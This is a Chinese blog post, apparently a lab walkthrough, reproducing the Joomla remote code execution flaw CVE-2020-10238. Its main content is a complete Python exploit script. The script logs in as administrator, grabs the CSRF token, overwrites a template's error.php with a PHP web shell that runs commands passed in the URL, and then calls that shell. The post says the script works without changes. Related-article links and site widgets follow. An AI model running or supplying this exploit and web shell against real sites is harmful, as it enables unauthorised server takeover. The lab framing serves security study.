(CVE-2020-10238)Joomla远程代码执行

最新推荐文章于 2024-02-20 11:46:21 发布
最新推荐文章于 2024-02-20 11:46:21 发布
阅读量892 收藏 1
点赞数
文章标签: shell 信息安全 cve 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55563900/article/details/115801067
版权

一、实验介绍

1.基本概念
Joomla!是美国Open Source Matters团队的一套使用PHP和MySQL开发的开源、跨平台的内容管理系统(CMS)。Joomla是一套内容管理系统,是使用PHP语言加上MYSQL数据库所开发的软件系统。

2.影响版本

    Joomla <= 3.9.15

二、实验目的

1.掌握漏洞产生的原理

2.了解漏洞影响版本

3.熟悉漏洞的修复方式

三、实验步骤

1.启动靶场查看实验环境;
2.下载执行脚本;
3.运行exp;
4.进行访问shell.
四、修复方式
官网及时下载最新版本和队员补丁:
https://downloads.joomla.org/(官网地址)

页面显示
在这里插入图片描述在网上搜索CVE-2020-10238,找到可执行的POC
找到可执行的python脚本,不用修改配置,直接执行

#!/usr/bin/python
import sys
import requests
import re
import argparse


def extract_token(resp):
    match = re.search(r'name="([a-f0-9]{32})" value="1"', resp.text, re.S)
    if match is None:
        print("[-] Cannot find CSRF token!")
        return None
    return match.group(1)


def try_admin_login(sess, url, uname, upass):
    admin_url = url + '/administrator/index.php'
    print('[+] Getting token for admin login')
    resp = sess.get(admin_url, verify=True)
    token = extract_token(resp)
    # print token
    if not token:
        return False
    print('[+] Logging in to admin')
    data = {
        'username': uname,
        'passwd': upass,
        'task': 'login',
        token: '1'
    }
    resp = sess.post(admin_url, data=data, verify=True)
    if 'task=profile.edit' not in resp.text:
        print('[!] Admin Login Failure!')
        return None
    print('[+] Admin Login Successfully!')
    return True


def check_admin(sess, url):
    url_check = url + '/administrator/index.php?option=com_templates'
    resp = sess.get(url_check, verify=True)
    token = extract_token(resp)
    if not token:
        print "[-] You are not administrator!"
        sys.exit()
    return token


def rce(sess, url, cmd, token):
    filename = 'error.php'
    shlink = url + '/administrator/index.php?option=com_templates&view=template&id=506&file=506&file=L2Vycm9yLnBocA%3D%3D'
    shdata_up = {
        'jform[source]': "<?php echo 'Hacked by HK\n' ;system($_GET['cmd']); ?>",
        'task': 'template.apply',
        token: '1',
        'jform[extension_id]': '506',
        'jform[filename]': '/' + filename
    }
    sess.post(shlink, data=shdata_up)
    path2shell = '/templates/protostar/error.php?cmd=' + cmd
    # print '[+] Shell is ready to use: ' + str(path2shell)
    print '[+] Checking:'
    shreq = sess.get(url + path2shell)
    shresp = shreq.text
    print shresp + '[+] Shell link: \n' + (url + path2shell)
    print '[+] Module finished.'


def main():

    # Construct the argument parser
    ap = argparse.ArgumentParser()
    # Add the arguments to the parser
    ap.add_argument("-url", "--url", required=True,
                    help=" URL for your Joomla target")
    ap.add_argument("-u", "--username", required=True,
                    help="username")
    ap.add_argument("-p", "--password", required=True,
                    help="password")
    ap.add_argument("-cmd", "--command", default="whoami",
                    help="command")
    args = vars(ap.parse_args())
    # target

    url = format(str(args['url']))

    print '[+] Your target: ' + url

    # username
    uname = format(str(args['username']))

    # password
    upass = format(str(args['password']))

    # command
    command = format(str(args['command']))

    sess = requests.Session()

    if (try_admin_login(sess, url, uname, upass) == None): sys.exit()

    token = check_admin(sess, url)

    rce(sess, url, command, token)


if __name__ == "__main__":
    sys.exit(main())

不用修改配置,直接执行即可
在这里插入图片描述复制url
查看到当前用户
在这里插入图片描述

&Lj
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
公众号文章集合-2020整理回顾
thelostworld
01-01 1405
公众号运营快一年,都是记录个人工作记录和分享,自己也比较佛系,有觉得发的必要才发,最近整理了一下一年来的相关的公众号推文(也把相关的文章进行归类整理一下)。 一、漏洞复现(原创) 1、CVE -2020-13942 (Apache Unomi 远程代码执行漏洞)复现 https://mp.weixin.qq.com/s/fQSRXk9FilS4ImUOH5lvuQ 2、CVE-2020-9484 (Tomcat cluster sync-session)复现 htt...
JoomlaRCE远程代码执行-CVE-2020-11890-10238-10239( 三个)复现
thelostworld
05-12 782
一、复现内容:JoomlaRCE远程代码执行CVE-2020-11890 <3.9.17 远程命令执行漏洞 CVE-2020-10238 <= 3.9.15 远程命令执行漏洞 CVE-2020-10239 3.7.0 to 3.9.15 远程命令执行漏洞二、漏洞详情:Joomla!是美国Open Source Matters团队的一套使用PHP和MySQL开发的开源、跨平台的内容管理系统(CMS)。此条漏洞编号已分配,漏洞详情即将更新。影响版本:CVE-2020-11890 <
ATT&CK实战系列—红队实战-3
Beret-81的博客
04-27 1453
ATT&CK实战系列—红队实战-30、靶场介绍1、信息收集2、漏洞分析2.1 漏洞挖掘2.2 漏洞扫描2.3 漏洞验证3、漏洞利用​3.1 Joomala Getshell3.2 主机信息收集3.3 敏感信息收集4、权限提升4.1 脏牛提权5、权限维持5.1 添加 root 后门6、横向渗透6.1 搭建 socks5 代理6.2 内网主机探测6.3 端口探测6.4 漏洞扫描6.5 域内横向--域成员6.6 域内横向--域控6.7 拿到 FLAG7、痕迹清理7.1 Linux7.2 windows 0
什么是开源软件(Open source software)
大鹏
02-09 1万+
开源软件(Open source software) 开源软件(英文全称:Open source software,英文缩写:OSS,中文全称:开放源代码软件)是一种源代码可以任意获取的计算机软件,这种软件的版权持有人在软件协议的规定之下保留一部分权利并允许用户学习、修改、增进提高这款软件的质量。开源协议通常符合开放源代码的定义的要求。一些开源软件被发布到公有领域。开源软件常被公开和合作地开
CVE-2020-16898: Windows TCP/IP远程执行代码漏洞通告
爱国小白帽
10-14 6661
原创 360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-101402 报告来源:360CERT 报告作者:360CERT 更新日期:2020-10-14 0x01 漏洞简述 2020年10月14日,360CERT监测发现 Microsoft 发布了 TCP/IP远程代码执行漏洞 的风险通告,该漏洞编号为CVE-2020-16875,漏洞等级:严重,漏洞评分:9.8。 远程攻击者通过构造特制的ICMPv6 Router Advertisemen
ATT&CK 实战 - 红日安全 vulnstack(三)渗透记录
daxi0ng的博客
12-02 2629
1、大概拓扑用一下先知老哥这个图。我加了一个攻击机kail 192.168.1.128 https://xz.aliyun.com/t/6988 渗透过程: 话说我下载下来centos就是root权限登录状态。不过测试流程还是要的。 1、用msf测了一下版本 2、跑一下端口 3、跑一下目录,发现配置文件的备份文件 4、登陆一下数据库 5、查看一下密码,加密的,并且没有权限改密文。 6、joomla后台漏洞比较多的,所以想着添加一个管理员进后台。正好官方文档就有.
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2020-11890:CVE-2020-11890
03-10
Joomla中的远程代码执行(RCE) 使用您的凭据运行cve202011890.py并访问链接rce: 使用docker的指南,例如: #步骤1: docker pull hoangkien1020 / joomla:3.9.16 #第2步: 码头工人运行-d --rm -it -p 8080:80...
CVE-2021-23132:com_media允许的路径不适合用于将图像上载到RCE
03-03
CVE-2021-23132 com_media允许的路径,不适用于将图像上载到RCE。 CVE-2020-24597 com_media中的目录遍历到RCE 两个CVE是相同的。 PoC(完整) 受影响的版本:Joomla核心<= 3.9.24 用户要求:管理员帐户(非超级管理员) 获得访问权限:创建超级管理员,然后触发RCE。 Joomla中的远程代码执行(RCE) 使用您的凭据运行cve-2021-23132.py并访问链接rce: http://target/templates/protostar/error.php?cmd=ls PoC: python3 cve-2021-23132.py -url http://192.168.72.140 -u admin -p 1234 -rce 1 -cmd ls 我写了PoC以便能够使用Directory T
CVE-2020-8163:CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码
03-09
CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码 在Rails <5.0.1中远程执行用户提供的本地名称 5.0.1之前的Rails版本中存在一个漏洞,该漏洞将允许攻击者控制render调用的locals参数。 已为该漏洞...
简单聊聊CVE-2020-13379
一个安全研究员
08-04 8023
多次跳转导致的ssrf
查看openssh版本_OpenSSH命令注入漏洞复现(CVE202015778)
weixin_39707536的博客
12-06 1571
OpenSSH命令注入漏洞复现(CVE-2020-15778)目录漏洞描述漏洞等级漏洞影响版本漏洞复现修复建议▶漏洞描述 OpenSSH是用于使用SSH协议进行远程登录的一个开源实现。通过对交互的流量进行加密防止窃听,连接劫持以及其他攻击。OpenSSH由OpenBSD项目的一些开发人员开发, 并以BSD样式的许可证提供,且已被集成到许多商业产品中。 2020年6月9日,研...
说一说Windows严重安全漏洞CVE-2020-0601的原理
热门推荐
云与山的彼端
01-20 6万+
1. 背景 这是第一个由美国国安局(NSA)所发现并主动提交给微软的安全漏洞。 过去外界曾抨击NSA隐匿安全漏洞,只为追求网络间谍与攻击的做法罔顾广大用户的权益,才使得这次NSA主动向微软通报安全漏洞的事件跃上媒体标题。 CVE-2020-0601漏洞位于Window的加密组件CryptoAPI。 CryptoAPI是微软提供给开发人员的Windows安全服务应用程序接口,可用于加密的应用程...
Joomla未授权访问漏洞CVE-2023-23752
dahege666的博客
03-23 2887
漏洞复现
Joomla远程代码执行(CVE-2021-23132)
最新发布
m0_65150886的博客
02-20 528
后台路径:/administrator 超级管理员:superadmin:123456 普通管理员:admin:123456。显示成功登录超级管理员账号后,创建了普通管理员,并更改了默认路径,实现了目录遍历这一步,之后删除了config.xml文件,又成功上传了新的config.xml文件,并赋予hk用户超级管理员权限。),添加完成后,点击上面的Save 保存页面。13.访问error.php文件,可看到空白页面,证明漏洞复现成功了。1.访问http://ip:port,出现如下页面,开始实验。
joomla 远程代码执行CVE-2021-23132)
weixin_68999845的博客
08-16 470
Joomla 3.2.0到3.9.24版本中,Joomla的com_media组件配置允许被任意修改导致Web级别目录遍历,攻击者通过一系列操作,进一步会导致远程命令执行。修复内容为:除了超级管理员外,其余权限的管理员在修改Path to Files Folder的时候只能向后降级如image/xxx。1.下载源码到本地:https://github.com/joomla/joomla-cms。源码下载url:https://github.com/joomla/joomla-cms。
Joomla 3.4.6 远程代码执行漏洞复现(超详细超简单o嘻嘻)
2301_76467680的博客
06-29 268
下载解压后放入wamp/www/Joomla或者phpstudy/PHPTutorial/WWW/Joomla/目录下,访问。然后根据提示删除安装目录即可。然后点击下一步点击安装。至此,环境搭建完毕。
解读CVE-2020-1938 POC代码
01-11
根据提供的引用内容,我无法直接解读CVE-2020-1938 POC代码,因为引用中的内容只是代码的一部分,并没有提供完整的代码。但是,我可以给你一些关于CVE-2020-1938的背景信息和一般的解读方法。 CVE-2020-1938是一个Apache Tomcat服务器的漏洞,该漏洞允许攻击者执行远程代码执行攻击。该漏洞的POC代码可以用于验证服务器是否受到此漏洞的影响。 要解读CVE-2020-1938 POC代码,你可以按照以下步骤进行: 1. 阅读POC代码的说明文档或相关文档,了解POC代码的用途和工作原理。 2. 分析POC代码的结构和逻辑,理解代码中使用的函数和变量的含义。 3. 根据POC代码中的注释和代码逻辑,推测代码执行流程和可能的漏洞利用方式。 4. 阅读POC代码中引用的其他代码或库的文档,了解它们的功能和用法。 5. 在安全环境下,使用合适的测试工具和技术,对目标服务器进行漏洞验证。 请注意,解读CVE-2020-1938 POC代码需要具备一定的安全知识和经验,并且在合法和合规的环境下进行。如果你不具备相关知识和经验,建议寻求专业人士的帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值